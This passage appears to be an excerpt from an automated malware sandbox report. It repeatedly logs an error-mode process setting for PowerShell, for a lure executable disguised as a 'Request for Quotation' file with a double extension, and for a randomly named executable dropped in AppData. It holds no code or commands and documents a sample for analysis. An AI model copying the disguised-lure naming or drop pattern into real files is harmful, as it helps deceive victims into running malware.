                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess information set: NOOPENFILEERRORBOX
